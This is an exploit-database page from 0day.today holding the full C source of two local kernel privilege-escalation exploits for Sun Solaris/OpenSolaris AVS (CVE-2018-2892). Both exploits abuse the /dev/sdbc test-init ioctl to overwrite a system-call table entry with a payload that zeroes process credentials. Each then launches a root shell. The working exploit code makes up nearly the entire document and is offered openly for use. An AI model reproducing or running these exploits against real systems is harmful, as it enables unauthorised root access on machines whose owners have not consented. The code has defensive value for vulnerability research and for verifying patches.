0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sun Solaris 11.3 AVS - Local Kernel root Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
/*
# Exploit Title: Solaris/OpenSolaris AVS kernel code execution
# Google Dork: [if applicable]
# Date: 24/7/2018
# Exploit Author: mu-b
# Vendor Homepage: oracle.com
# Software Link:
# Version: Solaris 10, Solaris <= 11.3
# Tested on: Solaris 11.X, OpenSolaris
# CVE : CVE-2018-2892
http://digit-labs.org/files/exploits/sdbc-testinit.c
http://digit-labs.org/files/exploits/sdbc-testinit-v2.c
a few more added to digit-labs as well, old irix-espd remote root for
irix as well.
/* sdbc-testinit.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Sun Opensolaris <= snv_104 local kernel root exploit
* by mu-b - Sun 21 Dec 2008
*
* $Id: sdbc-testinit.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Opensolaris snv_104 (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl32_s {
unsigned int arg0;
unsigned int arg1;
unsigned int arg2;
unsigned int arg3;
unsigned int arg4;
unsigned int magic;
unsigned int ustatus;
unsigned int pad[1];
} _sdbc_ioctl32_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
#define KTHREAD 0x16
#else
#define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0xc(%eax)");
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *target;
_sdbc_ioctl32_t sdcp_ioctl;
_sysent_t sysent;
int devindx, fd, id, n, sysindx;
printf ("Sun Opensolaris <= snv_104 local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = NULL;
sysent.sy_callc = NULL;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp += 8; /* any ideas? */
target = sysentp + 0x2C0;
sysindx = ((int) target - (int) sysentp) / sizeof (sysent);
devindx = ((char *) target - (char *) devarrayp) / 256;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
memcpy ((ptr + PAGESIZE) - sizeof (sysent), &sysent, sizeof (sysent));
memset (&sdcp_ioctl, 0, sizeof (sdcp_ioctl));
sdcp_ioctl.arg0 = (unsigned int) (ptr + PAGESIZE) - sizeof (sysent);
sdcp_ioctl.arg1 = devindx;
sdcp_ioctl.arg2 = sizeof (sysent) * 2;
printf ("* devarray: 0x%08X, sysent: 0x%08X, target: 0x%08X\n", (int) devarrayp, (int) sysentp, (int) target);
printf ("* devarray idx: %u\n", sdcp_ioctl.arg1);
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdcp_ioctl);
printf ("done\n");
printf ("\n* jumping... ");
syscall (sysindx);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
*/
/* sdbc-testinit-v2.c
*
* Copyright (c) 2008-2017 by <mu-b@digit-labs.org>
*
* Sun Solaris <= 11.3 AVS local kernel root exploit
* by mu-b - Tue 16 May 2017
*
* $Id: sdbc-testinit-v2.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Solaris 5.11 11.3 + AVS (i86pc)
* Opensolaris snv_104 + AVS (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* This was originally found in OpenSolaris and later ported to Solaris with the
* exception that we now have to exploit a signedness bug in the devarray index
* parameter whereas previously it was unbounded! (see sdbc-testinit.c).
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <limits.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl {
long arg0;
long arg1;
long arg2;
long arg3;
long arg4;
long magic;
long ustatus;
long pad[1];
} _sdbc_ioctl_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
# define KTHREAD 0x18
#else
# define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
#ifdef _LP64
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %rax\n"
"mov 0x1c8(%rax), %rax\n"
"movl $0x0, 0x4(%rax)\n" /* kthread_t->t_cred->cr_uid */
"movl $0x0, 0x8(%rax)\n" /* kthread_t->t_cred->cr_gid */
"movl $0x0, 0xc(%rax)\n" /* kthread_t->t_cred->cr_ruid */
"movl $0x0, 0x10(%rax)"); /* kthread_t->t_cred->cr_rgid */
#else
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0x8(%eax)\n"
"movl $0x0, 0xc(%eax)\n"
"movl $0x0, 0x10(%eax)");
#endif
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
#ifdef _LP64
Elf64_Shdr *shdr;
if ((shdr = elf64_getshdr (scn)) != 0)
#else
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
#endif
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
#ifdef _LP64
Elf64_Sym *esym = (Elf64_Sym *) data->d_buf;
Elf64_Sym *lastsym = (Elf64_Sym *) ((char *) data->d_buf + data->d_size);
#else
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
#endif
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
#ifdef _LP64
(ELF64_ST_TYPE(esym->st_info) == STT_FUNC))
#else
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
#endif
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *targetp;
int align, fd, id, n, sysindx;
_sdbc_ioctl_t sdbc_ioctl;
_sysent_t sysent;
long devindx;
printf ("Sun (Open)Solaris <= 11.3 AVS local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = pown_kernel;
sysent.sy_callc = pown_kernel;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
/* devarray elements are 256-bytes in size, so we can only write at an offset
* aligned to devarrayp & 0xff */
targetp = (void *) (((long) sysentp & ~0xFF) | ((long) devarrayp & 0xFF));
targetp += 0x1700;
sysindx = ((long) targetp - (long) sysentp) / sizeof (sysent);
devindx = ((char *) targetp - (char *) devarrayp) / 256;
devindx = (long) LONG_MIN + devindx;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == (void *) -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
align = ((long) sysentp & 0x0F) - ((long) devarrayp & 0x0F);
if (align < 0)
align = -align;
memcpy ((ptr + PAGESIZE) - sizeof (sysent) - align, &sysent, sizeof (sysent));
memset (&sdbc_ioctl, 0, sizeof (sdbc_ioctl));
sdbc_ioctl.arg0 = (long) (ptr + PAGESIZE) - sizeof (sysent);
sdbc_ioctl.arg1 = devindx;
sdbc_ioctl.arg2 = sizeof (sysent) * 2;
#ifdef _LP64
printf ("* devarray: 0x%016lX, sysent: 0x%016lX, target: 0x%016lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %016lX\n", devindx, devindx);
#else
printf ("* devarray: 0x%08lX, sysent: 0x%08lX, target: 0x%08lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %08lX\n", devindx, devindx);
#endif
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdbc_ioctl);
if (n != -1)
{
printf ("failed, ouch (%d)\n", n);
return (EXIT_FAILURE);
}
printf ("done\n");
printf ("* jumping... ");
syscall (sysindx);
printf ("done\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
char *args[2] = { "/bin/sh", NULL };
printf ("+Wh00t\n\n");
execve (args[0], args, NULL);
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
# 0day.today [2024-11-14] #